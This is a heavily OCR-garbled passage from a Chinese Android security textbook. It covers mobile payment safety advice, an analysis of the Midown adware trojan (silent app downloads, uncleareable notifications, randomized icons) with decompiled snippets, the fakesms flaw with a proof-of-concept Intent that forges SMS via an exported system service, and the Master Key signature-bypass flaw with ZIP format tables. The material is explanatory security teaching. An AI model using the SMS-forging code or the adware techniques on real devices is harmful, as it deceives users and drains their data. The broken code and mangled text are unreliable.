将 给 手机 支付 的 用 户 带 来 巨大 的 安全 隐患 。 

2. 安全 专家 建议 

针对 此 类 木马 程序 ，360 安全 专家 提出 了 以 下 保障 手机 安全 支付 的 建议 。 

给 支付 账户 设置 单独 的 、 高 安全 级 别 的 密码 ， 给 手机 支付 设置 手势 密码 。 
二 维 码 扫描 后 ， 如 果 是 下 载 超 链接 ， 谨 慎 下 载 。 

支付 应 实名 认证 。 

谨慎 保管 个 人 的 身份 证 、 银 行 卡 、 手 机 验证 码 等 隐私 信息 。 

不 单 击 不 明 超 链接 ， 不 安装 不 明文 件 。 

手机 上 安装 安全 管理 软件 。 

丢失 手机 后 应 打 电话 给 运营 商 和 支付 服务 商 挂失 。 
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194 广告 病毒 Android-Trojan/Midown 


GEO 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 19 章 \ 广 告 病毒 Android-Trojan/Midown.avi 

米 迪 是 中 国 的 一 个 无 线 广告 运营 平台 和 手机 游戏 联运 平台 ,成 立 于 2010 年 8 月 ， 由 位 于 湖北 省 武汉 市 
的 迪 派 无 线 (Dipai Wireless) 公司 运营 。 近 期 市 场 上 出 现 了 很 多 滥用 米 迪 广告 平台 的 Android 恶意 代码 ， 这 
部 分 代码 的 主要 特征 是 在 经 过 用 户 同 意 的 情况 下 自动 下 载 被 推广 的 应 用 ， 严 重 消耗 用 户 的 手机 资费 。 在 本 
节 的 内 容 中 ， 将 详细 讲解 米 迪 广告 平台 的 Android 恶意 代码 的 基本 知识 。 


19.4.1 米 迪 广告 平台 介绍 


武汉 迪 派 科技 有 限 公司 是 一 家 从 事 移动 互联 网 业务 的 高 科技 企业 ， 利 用 自身 研发 的 广告 平台 进行 广告 
推广 ,为 广大 的 企业 及 个 人 用 户 提供 全 方位 的 广告 信息 推送 服务 。 产 品名 称 为 米 迪 ， 英 文 Miidi， 如 图 19-27 
所 示 。 

米 迪 广告 平台 是 以 Symbian. Android. iPhone. J2Me 等 手机 操作 平台 作为 推广 平台 ， 通 过 电话 和 短信 
的 方式 触发 广告 弹出 ， 辅 助 以 短信 、 电 话 、 网 络 、 下 载 、 保 存 、 定 位 、 反 馈 、 购 买 等 交互 工具 ， 实 施 精准 
的 手机 广告 投放 ， 按 实际 效果 进行 费用 结算 。 近期 在 市 场 上 出 现 了 很 多 滥用 米 迪 广告 平台 的 Android 恶意 病 
毒 : Android-Trojan/Midown， 这 部 分 代码 的 主要 特征 是 在 经 过 用 户 同 意 的 情况 下 自动 下 载 被 推广 的 应 用 ， 
严重 消耗 用 户 的 手机 资费 。 
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9 
给 开发 彩带 来 准 广 应 用 ,实现 盈利 PRESOMAP ,提高 品牌 贡 名 度 。 创新 的 广告 形式 ,拓展 新 的 投放 汇 首 。 广 入 网 站 广告 ,实现 高 度 精准 广告 匹配。 
图 19-27 米 迪 广告 主页 


Android-Trojan/Midown 的 作者 将 一 些 常 用 的 Android 应 用 重新 打包 ， 例 如 ， 来电 号 码 归属 地 显示 应 用 ， 
手电 应 用 ,美女 拼图 和 主题 等 比较 有 诱惑 性 的 应 用 ， 然 后 捆绑 进修 改过 的 米 迪 插件 ， 并 在 米 迪 的 后 台 进行 
特殊 的 设置 ， 一 旦 用 户 安装 这 些 精心 制作 的 Android 应 用 ， 用 户 手 机 就 会 在 后 台 自动 下 载 更 新 米 迪 的 插件 ， 
私自 下 载 推广 应 用 ， 同 时 推送 广告 ， 给 用 户 造成 严重 的 资费 损耗 。 


19.4.2 分 析 Android-Trojan/Midown 


官方 的 米 迪 插件 曾经 被 Android-Trojan/Midown 的 作者 修改 过 ，Java 包 名 和 类 名 都 替换 掉 了 ， 内 部 的 代 
码 经 过 了 进一步 的 混淆 ， 包 的 结构 也 发 生 了 变化 ， 如 图 19-28 所 示 。 
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Android-Trojan/Midown 的 主要 特征 如 下 所 示 。 

а 一 旦 用 户 运 行 被 重新 打包 的 应 用 ， 马 上 在 后 台 联 网 下 载 更 新 ， 取 得 配置 文件 。 

а 在 用 户 手机 的 通知 栏 推送 广告 ， 并 且 不 可 以 清除 , 为 了 迷惑 用 户 , 通知 栏 的 广告 使 用 随机 的 图 片 作 
为 提示 图 标 ， 给 用 户 造成 极 大 困扰 。 

а 当 广 告 显示 在 用 户 的 通知 栏 时 ， 无 须 经 过 用 户 同 意 ， 广 告 中 的 Android 应 用 马上 被 下 载 ， 无 声 无 息 
地 消耗 用 户 流 量 ， 如 果 用 户 使 用 GSM/3G 等 移动 网 络 ， 有 可 能 造成 用 户 的 手机 资费 很 快 被 消耗 光 。 

口 用 户 运行 被 Android-Trojan/Midown 感 染 的 Android 应 用 之 后 ， 其 中 的 米 迪 插件 会 立即 联网 更 新 并 推 

广告 ， 然 后 直接 下 载 被 推广 的 应 用 。 
传递 和 接收 细节 如 图 19-29 所 示 。 
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图 19-29 传递 和 接收 细节 


被 推广 的 应 用 能 否 自 动 下载 ， 是 由 米 迪 后 台 的 一 个 选项 决定 的 ， 开 发 者 可 以 根据 需要 设置 这 个 选项 。 
在 米 迪 的 开发 者 后 台 的 “ 洪 加 应 用 ”页 面 中 ，“ 点 击 推送 广告 自动 下 载 ” 一 项 控制 着 广告 中 的 应 用 是 否 被 
自动 下 载 ， 如 果 选 择 “ 是 ”， 那 么 应 用 会 被 自动 下 载 ， 如 图 19-30 所 示 。 


4、 广 告 推送 相关 ( 填写 详细 广告 推送 . ) 
* 是否 使 用 广告 推送 相关 功能 : өш OF 


* 是 否 自 动 推送 广告 : em OS 
* 自动 推送 广告 显示 沁 率 : 加 每 次 启动 显示 〇 每 日 首次 启动 旺 示 
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图 19-30 “点 击 推送 广告 自动 下 载 ”项 


如 果 开 发 者 设置 了 自动 下 载 选 项 , 服务 器 对 米 迪 插件 的 POST 请 求 返 回 的 JSON 数据 将 会 包含 如 下 字段 。 
pushAdAutoDown=true 


然后 米 迪 插件 就 会 自动 下 载 对 应 的 Android 应 用 ， 如 图 19-31 所 示 。 


soe 常见 病 雪人 有 
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图 19-31 自动 下 载 对 应 的 Android 应 用 


像 其 他 移动 广告 平台 一 样 ， 米 迪 也 提供 了 广告 推送 功能 ， 并 提供 了 丰富 的 设置 选项 。 其 中 一 项 就 是 控 
制 Android 通知 栏 里 的 广告 能 否 被 用 户 通 过 简单 的 滑动 操作 或 者 清除 按钮 (只 有 部 分 手机 提供 这 一 按钮 ) T 
动 清除 ， 同 时 ， 这 也 是 衡量 一 个 Android 应 用 推送 的 广告 是 否 具 有 流 谍 性 质 的 判断 依据 。 

米 迪 官方 在 推送 每 个 应 用 时 ， 都 会 包含 一 个 名 为 clearable 的 选项 ， 如 果 这 个 值 为 true, ЖА, 用 户 就 可 
以 直接 通过 手指 滑动 操作 清除 通知 栏 的 广告 。 如 果 这 个 值 是 false， 这 个 通知 就 是 不 可 以 删除 的 ， 如 图 19-32 
所 示 。 
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eluents ya .сп/1364893970286. apk", ". “cmdToken2":n 
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пе motifyur! :nul11，notifykey :nu11， ES 180) 
图 19-32 clearable 选项 


如 果 clearable=true， 那 么 米 迪 插件 中 的 代码 在 创建 Notification 时 ， 会 将 其 flags 值 增加 一 个 名 为 
FLAG_NO_CLEAR 的 选项 ， 通 过 这 个 选项 ， 在 通知 栏 中 不 可 以 删除 该 Notification， 如 图 19-33 所 示 。 

在 此 需要 注意 的 是 ， 每 次 启动 Android-Trojan/Midown 后 都 会 随机 选择 一 个 图 片 ， 作 为 在 Android 手机 
通知 栏 显示 广告 通知 时 的 图 标 ， 这 样 的 伪装 具有 相当 的 迷惑 性 ， 使 得 用 户 根本 不 可 能 知道 是 哪个 Android 应 
用 在 推送 广告 ， 使 得 该 病毒 更 有 隐蔽 性 。 例 如 ， 下 面 是 一 个 被 感染 的 Android 应 用 中 嵌入 的 图 标 ， 以 供 随机 
选择 使 用 ， 它 们 不 是 原来 的 应 用 图 标 ， 而 是 在 重新 打包 时 被 Android-Trojan/Midown 放 进去 的 ， 如 图 19-34 
所 示 。 
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ВА 19-33 不 可 删除 Notification 
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图 19-34 ”被 感染 的 Android AHP CA B Ed bs 
“ 告 时 的 任务 栏 通知 。 


如 图 19-35 所 示 是 推送 / 
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E 19-35 推送 广告 时 的 任务 栏 通知 
如 图 19-36 所 示 演 示 了 对 应 的 随机 选择 图 标的 代码 。 


第 19 章 


public void initAd(Context paramContext) 
t 
adFree = true; 
Random localRandom = new Random(): 
Enti] arrayOfInt = | 2130837504, 2130837505, 2130837506, 2130837507 }; 
Pppp.init(paramCont: 27; s", false]; 
Popp. setPushAdIcon ; 
) 


图 19-36 ”对 应 的 随机 选择 图 标的 代码 


当 在 Android 手机 通知 栏 有 新 的 通知 信息 时 ， 一 般 都 会 闪光 、 震 动 或 者 播放 一 个 提示 音 ， 有 些 
Android-Trojan/Midown 的 变种 为 了 更 好 地 隐蔽 自己 ， 会 去 掉 提 示 音 ， 这 正 是 图 19-32 中 playSound:false 语 
句 的 作用 。 

应 用 推广 的 相关 选项 一 般 是 由 米 迪 服务 器 〈 广 告 主 ) 来 设置 的 ， 但 是 许多 广告 主 错误 地 设置 了 一 些 选 
701, lin, K 19-33 中 clearable 选项 并 不 是 唯一 控制 广告 栏 的 通知 是 否 可 以 清除 的 选项 , 米 迪 还 提供 一 个 名 
为 clearInstallNotification 的 选项 ,用 于 控制 是 否 可 以 清除 安装 完成 通知 ,在 正常 情况 下 , clearlnstallNotification 
选项 值 是 true。 但 是 在 分 析 过 程 中 却 发 现 ， 许 多 样本 将 这 一 选项 设置 为 false， 如 图 19-37 所 示 。 
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图 19-37 设置 为 “false” 
如 果 设 置 了 clearInstallNotification 选项 ， 则 会 依次 执行 图 19-38 和 图 19-39 中 的 代码 。 
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图 19-38 执行 的 代码 1 


void alandroid.content.Context p5, int рб, int p7, String p8, String s =Y 


м android.app.Notification(p7, pB, System.currentTineMiliis()); 
vl.flags = (vl flags | p12); 

фи = ө) 4 

pin android.content Intent() 
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vl setLatestEventInfo(p5, p9, naroid.app_pPenaingTntent getActivity(p5, 9, pil, 0)); 
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1939 执行 的 代码 2 
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同时 会 创建 一 个 具有 FLAG NO CLEAR 标志 的 软件 安装 成 功 的 Notification 信息 ， 这 个 Notification 是 
不 可 清除 的 ， 如 图 19-40 所 示 。 


此 时 用 户 除非 进入 Settings | Apps 界面 ， 找 到 创建 不 可 清除 通知 的 应 用 程序 的 App Infos 界面 ， 然 后 单 
击 其 中 的 Clear data 按钮 后 才 会 清除 掉 这 些 通知 。 当 然 前 提 是 用 户 能 够 找到 这 个 清除 功能 ， 如 图 19-41 所 示 。 
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图 19-40 创建 Notification 信息 图 19-41 清除 掉 通知 

由 此 可 见 ，Android-Trojan/Midown 病毒 制作 者 通过 研究 如 下 3 个 方面 进行 病毒 的 制作 投放 工作 。 

口 用 户 的 软件 使 用 习惯 。 

口 用 户 的 心理 。 

а 目前 移动 App 的 流行 趋势 。 

Android-Trojan/Midown 针对 用 户 日 常 必用 软件 ， 例 如 手电 和 位， 以 及 宅男 对 于 性 感 美女 的 偏好 等 进行 有 
针对 的 捆绑 感染 。 乍 一 看 ，Android-Trojan/Midown 像 一 个 正常 的 使 用 米 迪 广告 联盟 的 SDK 开发 Android 应 
用 ,但 是 再 仔细 一 看 ， 这 些 Android 应 用 都 是 经 过 重新 打包 的 ， 对 照 АРК 文件 中 的 签名 信息 可 以 发 现 ， 很 
多 都 是 同一 个 病毒 制作 者 所 为 ， 而 且 没有 经 过 任何 用 户 许可 就 自动 在 后 台 下 载 被 推广 的 应 用 ， 这 对 用 户 来 
说 是 最 不 可 接受 的 。 


Жоп ”常见 漏洞 分 析 


Android 系统 是 当今 最 流行 的 智能 设备 操作 系统 ， 和 其 他 任何 一 款 操作 一 样 ，Android 并 不 是 完美 无 瑕 
的 ， 在 不 断 的 版 本 更 新 中 提高 功能 和 性 能 ， 并 解决 旧版 本 中 的 一 些 漏洞 和 缺陷 。Android 系统 的 版 本 更 新 是 
-个 不 断 发 展 的 过 程 ， 在 本 章 的 内 容 中 ,将 介绍 在 Android 系统 的 发 展 过 程 中 常见 的 漏洞 的 基本 知识 ， 当 然 
这 些 漏洞 都 已 经 是 “过 去 式 ” 了 ， 因 为 在 Google 公布 的 新 版 本 中 已 经 解决 了 这 些 漏洞 。 本 章 重点 是 讲解 这 
些 漏洞 的 原理 和 危害， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


20.1 Android 漏洞 分 析 报 告 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 20 章 \Android 漏洞 分 析 报告 .avi 

由 于 Android 系统 的 开源 特性 , 注定 了 各 大 手机 厂商 百花 齐 放 , 市 面 上 的 Android 系统 安全 性 参差 不 齐 。 
更 为 严重 的 是 ， 如 果 Android 系统 爆 出 系统 漏洞 ， 由 于 各 大 手机 生产 商 安全 意识 不 强 ， 导 致 补丁 推送 速度 严 
重 跟 不 上 。 另 外 ， 因 为 开发 者 的 安全 意识 薄弱 ， 所 以 导致 产生 严重 的 逻辑 漏洞 。 同 时 ， 由 于 Android 系统 补 
丁 推送 的 滞后 性 ， 需 要 预备 一 套 应 对 系统 漏洞 的 应 对 方案 。 

SCAP 中 文 社区 是 一 个 安全 资讯 聚合 与 利用 平台 ， 当 前 的 社区 中 集成 了 SCAP 框架 协议 中 的 СУЕ. 
OVAL, CCE, CPE 这 4 种 网 络 安全 相关 标准 数据 库 。 用 户 可 以 方便 地 使 用 本 站 对 CVE 漏洞 库 、OVAL 漏 
洞 检查 语言 、CCE 通用 配置 枚 举 以 及 CPE 平台 列表 进行 查询 。SCAP 公布 了 截至 2013 年 底 的 Android 漏洞 
报告 ， 在 报告 中 列举 了 如 下 漏洞 。 

口 662 条 漏洞 信息 。 

О 771 条 到 OVAL 定 义 的 映射 。 

口 330 条 到 CVE 定 义 的 映射 。 

这 些 漏洞 包含 了 105 条 原生 漏洞 、33 条 框架 层 漏洞 、31 条 内 核 层 漏洞 、21 条 Native 层 漏洞 、368 条 应 
用 层 漏洞 、19 条 原生 应 用 层 漏洞 、349 条 第 三 方 应 用 漏洞 、182 条 第 三 方 组 件 漏洞 和 27 条 第 三 方 系统 漏洞 。 

总 体 的 漏洞 统计 如 图 20-1 所 示 。 
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图 20-1 Android 总 体 漏洞 统计 图 
Android 原生 漏洞 和 第 三 方 漏洞 统计 如 图 20-2 所 示 。 
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20-2 Android 原生 漏洞 和 第 三 方 漏洞 统计 图 


各 种 漏洞 在 Android KETTEN 20-3 所 示 。 
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图 20-3 各 种 漏洞 在 Android 框架 中 的 分 布 图 
在 SCAP 中 列 出 并 介绍 了 各 个 漏洞 的 说 明 信 息 ， 例 如 ， 原 生 漏洞 的 列表 信息 如 图 20-4 所 示 。 
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20-4 ”原生 漏洞 的 列表 
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单 击 列表 中 的 某 一 个 漏洞 条 目 ， 可 以 查看 这 个 漏洞 的 详细 信息 ， 如 图 20-5 所 示 。 
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IB] The CyanogenModiClockWorkModKoush Superuser package 1.0.2 1 for Android 4 3 and 4.4 does not properly 
restrict the set of users who can execute /system/xbin/su with the —daemon option, which allows attackers to gain privileges 


by leveraging ADB shell access and a certain Linux UID, and then creating a Trojan horse script. 
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FA 20-5 某 条 漏洞 的 详细 信息 


20.2 fakesms 漏洞 


ER 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 20 章 \fakesms 漏洞 .avi 

fakesms 漏洞 最 早 来 源 于 http://www.csc.ncsu.edu/faculty/jiang/smishing.html， 然 后 在 Github 上 给 出 了 具 
体 的 poc。 人 fakesms 漏洞 是 指 在 没有 write sms 权限 下 ， 任 意 一 个 APP 可 以 伪造 任意 发 件 人 的 任意 短信 。 

fakesms 漏洞 影响 Android 1.6 到 Android 4.1 版 本 。 一 个 典型 的 攻击 场景 是 恶意 APP 首先 向 ISP 发 送 
条 申请 业务 的 短信 ， 然 后 伪造 ISP 发 送 一 条 用 户 需 要 确认 的 短信 ， 当 用 户 确认 回复 时 就 会 中 招 。 

因为 国外 高 手 在 Github 站 点 上 公布 了 具体 的 poc, 所 以 整个 分 析 工作 将 变 得 十 分 简单 。 其 中 ,前 面部 分 
用 于 构造 ptu， 负 责 启动 Service 的 代码 如 下 所 示 。 

Intent intent = new Intent(); 

intent.setClassName("com.android.mms", 

"com.android.mms.transaction.SmsReceiverService"); 

intent.setAction("android.provider.Telephony.SMS_RECEIVED"); 

intent.putExtra("pdus", new Object[ ] ( pdu }); 

intent.putExtra("format", "3gpp"); 

context.startService(intent); 

通过 上 述 代码 启动 了 com.android.mms.transaction.smsreceiverService, “4 Service 启动 时 调用 如 下 运行 链 。 

onStartCommand->mServiceHandler.sendMessage(msg); 

这 样 消息 进入 到 ServiceHandler 的 消息 队列 中 ， 并 在 handleMessage 中 得 到 处 理 。 因 为 处 理 Action (5) 
fE) 是 SMS_RECEIVED， 所 以 进入 handleSmsReceived() 函 数 进行 处 理 ， 具 体 代 码 如 下 所 示 。 

© 


public void handleMessage(Message msg) { 


(0 Android FG 30 I RRR 


int serviceld = msg.arg1; 
Intent intent = (Intent)msg.obj; 
if (intent ! null) { 
String action = intent.getAction(); 


if(MESSAGE SENT ACTION.equals(intent.getAction())) ( 
handleSmsSent(intent); 
} else if (SMS RECEIVED ACTION.equals(action)) { 
handleSmsReceived(intent); 
) else if (ACTION BOOT COMPLETED.equals(action)) ( 
handleBootCompleted(); 
} else if (TelephonyIntents.ACTION SERVICE STATE CHANGED.equals(action)) ( 
handleServiceStateChanged(intent); 
} 


} 
11 NOTE: We MUST not call stopSelf() directly, since we need to 


// make sure the wake lock acquired by AlertReceiver is released. 
SmsReceiver.finishStartingService(SmsReceiverService.this, serviceld); 
) 
处 理 函数 handleSsmsReceived() 的 具体 实现 代码 如 下 所 示 。 
private void handleSmsReceived(Intent intent) { 
SmsMessage[] msgs = Intents.getMessagesFromlntent(intent); 
Uri messageUri = insertMessage(this, msgs); 


if (Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE)) { 
SmsMessage sms = msgs[0]; 
Log.v(TAG, "handleSmsReceived" + (sms.isReplace() ? "(replace)" : ") + 
" messageUri: " + messageUri + 
" address: " + sms.getOriginatingAddress() + 
", body: " + sms.getMessageBody()); 
} 


if (messageUri != null) { 
MessagingNotification. update NewMessagelndicator(this, true); 
} 
} 
通过 上 述 代码 MessagingNotification.updateNewMessagelndicator(this, true); 使 用 户 得 到 通知 , 这 就 是 平 
在 UI 界面 中 看 到 的 toast 和 短信 提示 框 ， 再 来 看 insertMessage0) 函 数 的 处 理 过 程 ， 具 体 实现 代码 如 下 所 示 。 
private Uri insertMessage(Context context, SmsMessage[] msgs){ 
// Build the helper classes to parse the messages. 
SmsMessage sms = msgs[0]; 


if (sms.getMessageClass() == SmsMessage.MessageClass.CLASS 0) { 
displayClassZeroMessage(context, sms); 
return null; 
} else if (sms.isReplace()) { 
return replaceMessage(context, msgs); 
ү else { 
return storeMessage(context, msgs); 
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在 上 述 代码 中 ，replaceMessage(0) 调 用 storeMessage() 将 短信 存 入 数据 库 ， 这 样 一 个 伪造 的 message 就 可 
为 了 找到 出 现 上 述 问 题 的 原因 ， 对 /system/app/Mms.apk 进行 反 编译 ， 在 获得 的 AndroidManifest.xml Ж 
件 中 可 以 看 到 如 下 内 容 。 
«application android:label="@string/app_label" 
android:icon="@drawable/ic_launcher_smsmms" 
android:name="MmsApp" 
android:taskAffinity="android.task.mms" 
android:allowTaskReparenting-"true" 
> 
<service android:name=".transaction.TransactionService" android:exported="true" /> 
<service android:name=".transaction.SmsReceiverService" android:exported="true" /> 
«activity android:theme="@android:style/Theme.NoTitleBar" 
android:label="@string/app_label" 
android:name=".ui.MmsTabActivity" 
android:launchMode-"singleTop" 
android:configChanges-"keyboardHidden|orientation" 
android:windowSoftlnputMode-"stateAlwaysHidden|adjustPan" 
> 
由 此 可 见 ，SmsReceiverService 被 输出 后 并 没有 使 用 permission 声明 的 signature、signatureOrSystem 或 
Dangerous 权限 ,甚至 也 没有 Normal 声明 ,在 代码 中 也 没有 显 式 调用 checkPermission 权限 ,这 违反 了 Android 
开发 规范 ， 造 成 了 事实 上 的 permission-redelegation 漏洞 。 因 为 Mms 属于 系统 程序 ， 存 在 于 所 有 的 
android-platform 中 ， 所 以 后 果 十 分 严重 。 


203 签名 验证 漏洞 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 20 章 \ 签 名 验证 漏洞 .avi 

北京 时 间 2013 年 7 月 10 日 消息 , 据 科 技 网 站 BGR 报道 , Bluebox Security 上 周 发 布 了 一 则 惊人 的 消息 ， 
宣称 Android 系统 中 的 Master Key 漏洞 可 以 把 任何 应 用 变 成 木马 , 用 来 操控 4 年 来 99% 的 Android FHL, 谷 
歌 今天 面向 OEM 厂商 发 布 了 漏洞 补丁 。 在 本 节 的 内 容 中 ， 将 详细 讲解 Master Key 漏洞 的 基本 知识 。 


20.3.1 Master Key 漏洞 介绍 


Master Key 漏洞 的 编号 是 #8219321，Bluebox Security 首席 技术 官 Jeff Forristal 表示 ，Master Key 漏洞 至 
少 自 Android 1.6 以 后 就 已 经 存在 了 ， 影 响 范围 涉及 过 去 4 年 间 发 布 的 所 有 Android FH, KAE 9 亿 台 设备 。 
此 安全 问题 出 在 Android 应 用 的 认证 和 安装 方式 上 。 在 Android 系统 中 ， 每 个 应 用 都 有 一 个 加 密 签名 ， 以 确 
保 应 用 中 的 内 容 未 被 算 改 。 这 次 发 现 的 漏洞 允许 黑客 在 保持 签名 完整 的 情况 下 ， 修 改 应 用 中 的 内 容 。 

谷歌 Android 公关 经 理 Gina Scigliano 表示 ， 谷 歌 已 经 将 漏洞 补丁 提供 给 合作 伙伴 ， 如 三 星 等 OEM J ` 
商 ， 厂 商 将 为 自家 设备 提供 安全 更 新 。Scigliano 还 说 ， 这 其 实 没什么 好 担心 的 ， 他 们 在 利用 安全 扫描 工具 
检查 后 ， 未 在 Google Play 或 是 其 他 App 商店 中 ,发 现任 何 使 用 这 个 漏洞 的 证 据 ，Google Play 会 持续 检查 这 
个 漏洞 ， 而 应 用 认证 (Verify Apps) 则 可 以 保护 从 其 他 商店 下 载 应 用 的 Android 用 户 。 


егез 


但 是 Android 系统 Master Key 漏洞 一 波 未 平一 波 又 起 ，2013 年 11 月 ， 国 外 安全 研究 人 员 爆 料 Android 
系统 存在 第 三 个 Master Key 漏洞 ， 黑 客 可 以 通过 该 漏洞 完成 控制 用 户 的 手机 。 目 前 ，Google 官方 已 经 修复 
了 该 漏洞 , 但 是 由 于 Android 系统 更 新 的 推动 力 更 多 来 自 于 各 个 设备 生产 商 , 因此 补丁 的 推送 滞后 非常 严重 。 

2013 年 7 月 3 H, bluebox 在 官网 发 文 该 漏洞 ， 详 见 : 

http://bluebox.com/corporate-blog/bluebox-uncovers-android-master-key/ 

2013 年 7 月 7 日 ， 知 名 专家 cyanogenmod 发 布 了 修复 补丁 ， 详 见 : 

http://review.cyanogenmod.org/#/c/45251/ 


20.3.2 ZIP 格式 的 文件 结构 


MasterKey 漏 洞 的 主要 原理 是 ,Android 在 解析 ZIP 包 时 没有 校 验 ZipEntry 和 Header 中 的 FileNameLength 
是 否 一 致 。 在 分 析 Master Key 漏洞 的 原理 前 ， 接 下 来 首先 要 了 解 ZIP 格式 的 文件 结构 。 
如 果 一 个 压缩 包 文 件 里 有 多 个 文件 ， 可 以 认为 每 个 文件 都 是 被 单独 压缩 ， (NITY 


Local Header 1 


然后 再 拼 成 一 起 。 一 个 ZIP 文件 由 3 部 分 组 成 ， 即 “压缩 源 文件 数据 区 + 压缩 WI 
源 文件 目录 区 + 压缩 源 文件 目录 结束 标志 ”， 有 具体 如 图 20-6 所 示 。 
各 个 部 分 的 具体 说 明 如 下 所 示 。 


о 文件 头 〈 压 缩 源 文件 目录 区 : 在 文件 末尾 ， 即 图 20-6 中 的 FileHeader， 
记录 了 索引 段 的 偏 移 、 大 小 等 。 

о 数据 段 (压缩 源 文件 数据 区 ): 在 文件 开头 , 即 图 20-6 中 的 Local Header, 
记录 了 数据 的 一 些 基本 信息 ， 可 以 用 来 与 File Header 中 记录 的 数据 进 
行 比 较 ， 保 证 数据 的 完整 性 。 

0 Local Header 还 包含 了 文件 被 压缩 之 后 的 存储 区 , 即 图 20-6 中 的 Data 区 域 。 


1. 压缩 的 文件 内 容 源 数据 


记录 着 压缩 的 所 有 文件 的 内 容 信息 ， 其 数据 组 织 结构 是 对 于 每 个 文件 都 由 
file header、file data、data descriptor 这 3 部 分 组 成 。 
(1) file header: 用 于 标识 该 文件 的 开始 ， 结 构 说 明 如 表 20-1 所 示 。 


表 20-1 file header 结构 说 明 


Local Header 3 
swvsssssssss 


[CeswatDiectoyy] | te3Daa| | riez0aa) [File T Data] 


图 20-6 ZIP 格式 的 文件 结构 


Offset Bytes її BB 
0 4 文件 头 标识 ， 值 固定 (0x04034b50) 
4 2 解压 文件 所 需 pkware 最 低 版 本 
6 2 通用 位 标记 
8 2 压缩 方法 
10 2 文件 最 后 修改 时 间 
12 2 文件 最 后 修改 日 期 
14 4 说 明 采 用 的 算法 
18 4 压缩 后 的 大 小 
22 4 非 压缩 的 大 小 
26 2 文件 名 长 度 
28 2 扩展 区 长 度 
30 n 文件 名 
30+n m 扩展 区 
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(2) file data: 相应 压缩 文件 的 源 数 据 。 
(3) data descriptor: 用 于 标识 该 文件 压缩 结束 ， 该 结构 只 有 在 相应 的 header 中 通用 标记 字段 的 第 3 位 
BA 1 时 才 会 出 现 ， 紧 接 在 压缩 文件 源 数据 后 。 这 个 数据 描述 符 只 用 在 不 能 对 输出 的 ZIP 文件 进行 检索 时 
使 用 。 例 如 ， 在 一 个 不 能 检索 的 驱动 器 〈 如 磁带 机 上 ) 上 的 ZIP 文件 中 。 如 果 是 磁盘 上 的 ZIP 文件 一 般 没 
有 这 个 数据 描述 符 。 
data descriptor 结构 的 具体 说 明 如 表 20-2 所 示 。 
表 20-2 data descriptor 结构 的 具体 说 明 


Offset 说 HH 
0 本 地 header 标记 
4 CRC-32 
8 压缩 后 大 小 
12 非 压缩 的 大 小 


2. 压缩 的 目录 源 数据 


对 于 待 压 缩 的 目录 来 说 ， 每 一 个 子 目录 对 应 一 个 压缩 目录 源 数 据 ， 记 录 该 目录 的 描述 信息 。 压 缩 包 中 
所 有 目录 源 数 据 连续 存储 在 整个 归档 包 的 最 后 ， 这 样 便于 向 包 中 追加 新 的 文件 。 
压缩 的 目录 源 数据 结构 的 说 明 如 表 20-3 所 示 。 


表 20-3 压缩 目录 源 数据 结构 的 说 明 


Offset Bytes ў. HB 
0 4 核心 目录 文件 header 标识 = (0x02014b50) 
4 2 压缩 所 用 的 pkware 版 本 
6 2 解压 所 需 pkware 的 最 低 版 本 
8 2 通用 位 标记 
10 2 压缩 方法 
12 2 文件 最 后 修改 时 间 
14 2 文件 最 后 修改 日 期 
16 4 CRC-32 算法 
20 4 压缩 后 大 小 
24 4 未 压缩 的 大 小 
28 2 文件 名 长 度 
30 2 扩展 域 长 度 
32 2 文件 注释 长 度 
34 2 文件 开始 位 置 的 磁盘 编号 
36 2 内 部 文件 属性 
38 4 外 部 文件 属性 
42 4 本 地 文件 header 的 相对 位 移 
46 n 目录 文件 名 

46+n m 扩展 域 

46+n+m k 文件 注释 内 容 
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3. 目录 结束 标识 结构 
目录 结束 标识 存在 于 整个 归档 包 的 结尾 ， 用 于 标记 压缩 的 目录 数据 的 结束 。 目 录 结 束 标识 结构 的 说 明 


如 表 20-4 所 示 。 
表 20-4 ”目录 结束 标识 结构 的 说 明 

Offset Bytes 说 BB 
0 4 核心 目录 结束 标记 (0x06054b50) 
4 2 当前 磁盘 编号 
6 2 核心 目录 开始 位 置 的 磁盘 编号 
8 2 该 磁盘 上 所 记录 的 核心 目录 数量 
10 2 核心 目录 结构 总 数 
12 4 核心 目录 的 大 小 
16 4 核心 目录 开始 位 置 相对 于 archive 开始 的 位 移 
20 2 注释 长 度 
22 n 注释 内 容 


20.3.3 分析 Master Key 漏洞 


如 图 20-7 和 图 20-8 所 示 是 Local Header (图 20-7 中 的 ZIPFILERECORD) ) 和 File Header (图 20-8 中 的 
ZIPDIRENTRY) 的 数据 对 比 ， 由 此 可 见 ， 两 者 数据 是 完全 一 致 的 。 


4 struct ZIPFILERECORD recordl0J res/xml/lock_sereen, xnl 
char frSi gnature[4] PK 
ushort frVersion 20 
ushort frFlags 2056 
enum COMPTIPE frCompression CONP DEFLATE (8) 
DOSTINE frFilelime 23:41:24 
DOSDATE frFileDate 10/13/2013 
uint frCre 3Т258Е59Һ 
uint frConpressedSize 187 
uint frinconpressedSize 392 
ushort frFileWameLength 23 
short frExtraFieldLength 4 


char frFileNane[23] res/xnl/lock screen.xml 
char frExtraField[4] € 


图 20-7 Local Header 的 数据 


4 struct ZIPDIRENTRY dirEntryl0] res/xnl/lock screen. xml 
=== 

ushort deVersionMadeBy 20 

ushort deVersionToExtract 20 

ushort deFlags 2056 

enum COMPTYPE deCompression COMP DEFLATE (8) 

DOSTIME deFileTime 23:41:24 

DOSDATE deFileDate 10/13/2013 

uint delre 37258F59h 

uint deCompressedSize 187 

uint deUncompressedSire 392 

ushort deFileNameLength 23 

ushort deExtraFieldLength 4 

wushort deFileConmentLength 0 

ushort deDiskNumberStart 0 

ushort deInternalAttributes 0 


图 20-8 File Header 的 数据 


(1) 原理 分 析 
Master Key 漏洞 的 原理 是 恶意 APK 可 以 绕 过 Android 签名 验证 机 制 ， 直 接 控制 手机 上 的 АРК. Ў 
复 前 后 的 对 比如 图 20-9 所 示 。 


e 


if (numEntries != 
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Patch Set Base 1 122] 
+10 
totalNunEntries || diskNumber != 0 || disk#ithCentralDir 


throw new ZipException( spanned archives not supported"): 


Ё 


// Seek to the first СРЕ and read all entries. 


RAFStream rafs = 


new RAFStream(nRaf, centralDirÜffset): 


